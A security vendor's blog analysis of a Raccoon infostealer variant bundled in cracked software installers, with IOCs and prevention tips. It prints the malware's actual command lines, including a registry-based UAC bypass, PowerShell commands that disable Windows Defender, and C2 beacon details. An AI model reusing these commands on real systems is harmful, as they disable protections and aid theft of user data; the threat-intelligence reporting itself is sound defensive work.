Featured On
Amidst an expanding background of emerging COVID-19 cyber threats, the ReasonLabs research team discovered and reported on a new variant of the malware family - Raccoon malware. Initially discovered back in 2019, this new variant of the malware family has been designed to steal user data from browsers. In this article, we will analyze this new variant, its attack methods, and disguise techniques.
Are you protected from online scams? Take our quick Security Quiz to find out.
Raccoon Malware: What do we know?
Here’s what we know so far: The Raccoon malware masquerades itself as a legitimate, known program installer. The new malware sample flew under the AV radar and there were only three minimal detections on VirusTotal over two weeks ago. The virus file we detected is a Trojan that comes from the family of Raccoon malware. This Trojan is designed to steal user data from about 60 browsers. It is capable of taking screenshots from the victim machine and capturing input.
The first versions of this malware family seen in the wild were written in C++, but a year has gone by and the malware authors have since developed new versions written in Borland Delphi, apparently to make it harder to detect and analyze. The malware comes inside an Inno Setup installer that is responsible for installing both the original program and the malware.
Execution flow of the Trojan installation
The InnoSetup script file runs regular installation and extracts the malware. The samples we obtained imitate benign program installers (I.e. Bandicam, Revo Uninstaller) but hide a Trojan inside them. The installation of the original programs (which are usually cracked versions of programs that have a paid version, so the user knows the installation is not from the original site) will proceed as usual, so the user will not suspect that anything suspicious has happened.
The execution flow of the Trojan installation is very apparent, with alerting command lines and the execution of PowerShell and VBScript, which should have raised alarm bells in all of the security products. However, for some reason, the samples we caught had only three minimal detections on VirusTotal (and as of May 6th, 2020, even 0 detections!). The samples were uploaded to VirusTotal more than two weeks ago.
Once installed, the malware will disable Windows Defender using PowerShell, use VBS to unpack executables from a password-protected zip file contained in the installer, and change the registry to disable the admin approval prompt. The sophisticated network communication remains the same as it was in the first versions: Web requests to Google Docs (or GitHub) in order to acquire the malware’s CNC IP address. In this way, the address is not hardcoded in the sample.
The first stage of the Trojan’s operation is to filter the CNC address from the response and then send base64 encoded params (decodes to bot_id=59407D34-C8C5-44DF-A766 BA8A11CB1CB0_Shayne&config_id=654d0d2e43e786a31eb3ea9dc114b4d91d2014d0&data=null) to “gate/log.php”.
Are you protected from online scams? Take our quick Security Quiz to find out.
Connections
- Sn.exe -> 172.217.16.174:443
- Sn.exe -> 216.58.208.33:443
- Sn.exe -> 34.65.6.73:80
DNS requests
- Drive.google.com
- 172.217.16.174
- doc-08-6g-docs.googleusercontent.com
- 216.58.208.33
Process tree of the malicious part:
-
cmd.exe (PID: 4204 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\uacb.cmd’ )
- conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
- reg.exe (PID: 1364 cmdline: REG ADD ‘HKCU\SOFTWARE\Classes\ms-settings\shell\open\command’ /t REG_SZ /d ‘C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f’ /f)
- reg.exe (PID: 5468 cmdline: REG ADD ‘hkcu\software\classes\ms-settings\shell\open\command’ /v DelegateExecute /t REG_SZ /d ‘ ‘ /f)
-
cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\cloudb.cmd’ ‘)
- conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
- powershell.exe (PID: 3132 cmdline: PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force)
- powershell.exe (PID: 5480 cmdline: PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend)
-
wscript.exe (PID: 5264 cmdline: ‘C:\Windows\System32\WScript.exe’ ‘C:\ProgramData\runner.vbs’)
- cmd.exe (PID: 5336 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\7z.cmd’ ‘)
- conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
- 7za.exe (PID: 5432 cmdline: ‘7za.exe’ x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData)
- sn.exe (PID: 5560 cmdline: sn.exe )
- sn.exe (PID: 5840 cmdline: {path} )
- cmd.exe (PID: 5336 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\7z.cmd’ ‘)
Are you protected from online scams? Take our quick Security Quiz to find out.
IOCs:
*docs.googleusercontent.com ip.of.cn.c/gate/log.php Execution flow of: \cmd.exe /c ”C:\ProgramData\uacb.cmd’
- REG ADD ‘HKCU\SOFTWARE\Classes\ms-settings\shell\open\command’ /t REG_SZ /d ‘C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f’ /f
- REG ADD ‘hkcu\software\classes\ms-settings\shell\open\command’ /v DelegateExecute /t REG_SZ /d ‘ ‘ /f
- cmd.exe /c ”C:\ProgramData\cloudb.cmd’
- PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- WScript.exe’ ‘C:\ProgramData\runner.vbs’
- cmd.exe /c ”C:\ProgramData\7z.cmd’
- ‘7za.exe’ x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData
- sn.exe
SHA256 of whole samples (not the dropped samples):
- 4187a452dfce94ae6aac47b015336de12419a7c99746e8d00de62fdbbfc61d98
- 4ad85cc8d9ee1fb2738d51083e153b8445b15c284b222ab5daa404cff63080ff
- C0295b29edf694d56d82df4d8628bc97839c656f6f1e8a1f50660e32d59b1949
- 4c451b1881d6eaf9d192c8b5bf1b79d2e28265eef11b7d02c54939e7fe310e8b
- 0bf2cd7594ad46c8a01ab79f862eeeba8f6a03e087f3ae4fb256e90535e605ff
- 59fb625ddd27fe45cba0235046be23f6746ece3c9cd0f68acafc180b9c1404c2
ReasonLabs plays a leading role in advancing the state of cybersecurity intelligence. We collect raw data about existing and emerging threats from always-on active sensors and then continuously analyze, organize, and add context to evolving cyber activities and attacks in order to deliver actionable insights in real time. This powerful intelligence network leaves ReasonLabs prepared to meet threats head-on.
How to prevent malware infection on your device
In general, you should follow cybersecurity best practices to avoid malware wreaking havoc on your device. Follow these essential tips to help you prevent malware infections:
- Use antivirus and anti-malware software: Install reputable antivirus and anti-malware software, like RAV Endpoint Protection, on your device. Keep the software updated to ensure it can detect and remove the latest threats.
- Keep operating system and software updated: Regularly update your operating system (OS) and all installed software. Software updates often include security patches that address vulnerabilities exploited by malware.
- Enable automatic updates: Enable automatic updates for your operating system and security software to ensure timely installation of patches and updates.
- Be cautious with email attachments: Avoid opening email attachments or clicking on links in emails from unknown or suspicious sources. Malware often spreads through phishing emails.
- Use strong, unique passwords: Create strong and unique passwords for your accounts. Avoid using the same password across multiple accounts, and consider using a password manager for added security.
- Secure your network: Use a strong, unique password for your Wi-Fi network. Enable WPA3 encryption if available, and regularly change the default login credentials for your router.
- Be selective with downloads: Download software and files only from reputable sources. Avoid downloading cracked or pirated software, as they may contain hidden malware.
- Use a firewall: Enable a firewall on your device to monitor and control incoming and outgoing network traffic. This adds an extra layer of protection against unauthorized access.
- Phishing scam awareness: Learn to recognize phishing attempts. Be cautious with emails, messages, or websites that request personal or sensitive information.
- Backup your data regularly: Regularly back up your important data to an external drive or a secure cloud service. In case of a malware attack, you can restore your data without paying a ransom.
By implementing these preventive measures, you can significantly reduce the risk of malware infections and enhance the overall security of your device. For more information, visit www.reasonlabs.com.
Are you protected from online scams? Take our quick Security Quiz to find out.